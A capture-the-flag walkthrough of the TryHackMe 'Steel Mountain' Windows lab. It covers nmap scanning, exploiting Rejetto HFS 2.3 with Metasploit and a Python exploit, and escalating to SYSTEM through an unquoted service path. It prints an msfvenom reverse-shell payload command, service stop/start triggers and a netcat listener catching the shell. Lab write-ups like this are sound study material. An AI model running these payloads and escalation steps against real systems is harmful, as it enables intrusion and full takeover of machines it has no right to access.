Steel Mountain - wook413

#tryhackme #windows #easy ![[Pasted image 20250707204904.png]] --- # Information Gathering - Nmap Started off with TCP port scanning against all 65,535 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:29 CDT Nmap scan report for 10.10.23.236 Host is up (0.16s latency). Not shown: 58860 closed tcp ports (reset), 6660 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman 8080/tcp open http-proxy 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49163/tcp open unknown 49164/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 40.40 seconds ``` Then I conducted another TCP port scanning against those open ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 80,135,139,445,3389,5985,8080,47001,49152-49164 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:31 CDT Nmap scan report for 10.10.23.236 Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 |_http-title: Site doesn't have a title (text/html). |_http-server-header: Microsoft-IIS/8.5 | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=steelmountain | Not valid before: 2025-07-06T02:28:25 |_Not valid after: 2026-01-05T02:28:25 |_ssl-date: 2025-07-07T02:33:00+00:00; -1s from scanner time. | rdp-ntlm-info: | Target_Name: STEELMOUNTAIN | NetBIOS_Domain_Name: STEELMOUNTAIN | NetBIOS_Computer_Name: STEELMOUNTAIN | DNS_Domain_Name: steelmountain | DNS_Computer_Name: steelmountain | Product_Version: 6.3.9600 |_ System_Time: 2025-07-07T02:32:56+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8080/tcp open http HttpFileServer httpd 2.3 |_http-title: HFS / |_http-server-header: HFS 2.3 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp closed unknown 49158/tcp closed unknown 49159/tcp closed unknown 49160/tcp closed unknown 49161/tcp closed unknown 49162/tcp closed unknown 49163/tcp open msrpc Microsoft Windows RPC 49164/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-07-07T02:32:56 |_ start_date: 2025-07-07T02:28:19 | smb2-security-mode: | 3:0:2: |_ Message signing enabled but not required |_clock-skew: mean: -1s, deviation: 0s, median: -1s |_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:eb:d3:88:2f:75 (unknown) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.35 seconds ``` Lastly, performed UDP port scanning against top 1,000 ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:34 CDT Nmap scan report for 10.10.23.236 Host is up (0.13s latency). Not shown: 997 open|filtered udp ports (no-response) PORT STATE SERVICE 137/udp open netbios-ns 16697/udp closed unknown 49153/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds ``` --- # Footprinting ##### port 80 - HTTP The landing has the picture of employee of the month in the center. ![[Pasted image 20250706213735.png]] It appears his name is `Bill Harper`. It's a good habit to note every name you find while doing enumeration because you can potentially turn those found names into a wordlist ![[Pasted image 20250706213842.png]] ##### port 8080 - HTTP The service on port 8080 appears to be `HttpFileServer` as you can see at the bottom left. The version is `2.3` ![[Pasted image 20250706214800.png]] I guess there are multiple HTTP file servers and the name of this particular service being used here is `rejetto`. ![[Pasted image 20250706220506.png]] Since we are now aware of the name of the service and the version, I searched this up using `searchsploit` and there's this known vulnerability to this version and it's RCE! ![[Pasted image 20250706221157.png]] # Exploit - Using Metasploit There are many versions but I decided to go with `Metasploit` one just because THM specifically mentioned to use the Metasploit exploit. In `C:\Users\bill\Desktop`, I found `user.txt` ```powershell meterpreter > dir Listing: C:\Users\bill\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2019-09-27 06:07:07 -0500 desktop.ini 100666/rw-rw-rw- 70 fil 2019-09-27 07:42:38 -0500 user.txt meterpreter > cat user.txt b047... ``` # Privilege Escalation To enumerate for privilege escalation, we are going to use a powershell script called `PowerUp`. First, let's upload `PowerUp.ps1` from our local machine. ```bash meterpreter > upload /opt/windows/PowerUp.ps1 [*] Uploading : /opt/windows/PowerUp.ps1 -> PowerUp.ps1 [*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /opt/windows/PowerUp.ps1 -> PowerUp.ps1 [*] Completed : /opt/windows/PowerUp.ps1 -> PowerUp.ps1 meterpreter > dir Listing: C:\Users\bill\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 600580 fil 2025-07-07 00:18:08 -0500 PowerUp.ps1 100666/rw-rw-rw- 282 fil 2019-09-27 06:07:07 -0500 desktop.ini 100666/rw-rw-rw- 70 fil 2019-09-27 07:42:38 -0500 user.txt ``` In order to execute this using `Meterpreter`, we need to type `load powershell`, then `powershell_shell` to get PowerShell. ```bash meterpreter > load powershell Loading extension powershell...Success. PS > ``` We need to import `PowerUp.ps1` using `Dot sourcing` then execute `Invoke-AllChecks` ```powershell PS > . .\PowerUp.ps1 PS > Invoke-AllChecks ``` We found an `Unquoted Service Paths` vulnerability, the service can be restarted, and also the directory is also writeable which indicates that we can replace the application with our malicious payload. ![[Pasted image 20250707002819.png]] Use `msfvenom` to generate a reverse shell payload as an Windows executable ```bash msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -f exe-service -o Advanced.exe ``` We have to move our payload in the same directory as the original service is in so our payload can be triggered instead of the original service. ```powershell PS > mv Advanced.exe 'C:\Program Files (x86)\IObit\' ``` ```powershell Directory: C:\Program Files (x86)\IObit Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 7/6/2025 10:13 PM Advanced SystemCare d---- 9/26/2019 10:35 PM IObit Uninstaller d---- 9/26/2019 8:18 AM LiveUpdate -a--- 7/6/2025 10:38 PM 15872 Advanced.exe ``` Return to `Meterpreter` by typing `shell`. Then stop the original service `AdvancedSystenmCareService9` and restart it which will trigger our payload ```powershell meterpreter > shell 00:50:09 [57/720] Process 2824 created. Channel 6 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. ``` ```bash C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9 sc stop AdvancedSystemCareService9 SERVICE_NAME: AdvancedSystemCareService9 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9 sc start AdvancedSystemCareService9 SERVICE_NAME: AdvancedSystemCareService9 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2884 FLAGS : ``` Got the shell as `nt authority\system` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 3333 listening on [any] 3333 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.53.154] 49273 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ``` Found `root.txt` ```bash Directory of C:\Users\Administrator\Desktop 10/12/2020 12:05 PM <DIR> . 10/12/2020 12:05 PM <DIR> .. 10/12/2020 12:05 PM 1,528 activation.ps1 09/27/2019 05:41 AM 32 root.txt 2 File(s) 1,560 bytes 2 Dir(s) 44,156,801,024 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt 9af... ``` # Exploit - Without using Metasploit We are going to get our initial access with the same exploit but this time we are going to use the Python version, not the Metasploit one. Additionally, we need to download a `netcat` static binary. As the exploit tells us, we need a netcat binary on our web server. I downloaded it from here https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe TryHackMe instructs us that we need to run the exploit twice. The first time will pull our netcat binary to the system and the second time will execute our payload to gain a callback. ![[Pasted image 20250707195106.png]] As you can see from the screenshot below, the first time (`red box and red arrow`) I ran it, it retrieved my `nc.exe` binary and the second time (`blue box and blue arrow`) executed my payload and I gained a reverse shell as `bill`. ![[Pasted image 20250707200310.png]] # Privilege Escalation To easily find attack vectors for privilege escalation, I am going to use `winPEAS`. I have transferred the file from my local kali to this remote Windows system. ![[Pasted image 20250707202401.png]] Ran `winPEASx64.exe` and it revealed the same vulnerability that we found using `PowerUp.ps1` ![[Pasted image 20250707202903.png]] We can transfer the reverse shell payload `Advanced.exe` that we had created before from my local Kali to this remote Windows machine. ![[Pasted image 20250707203518.png]] Before we run our payload, we need to stop the currently running service `AdvancedSystemCareService9`. ![[Pasted image 20250707203702.png]] Copied the file to the path `C:\Program Files (x86)\IObit\Advanced.exe`. Then started the service again. ![[Pasted image 20250707204551.png]] As soon as the service started, I gained the reverse shell via the listener :) ![[Pasted image 20250707204743.png]]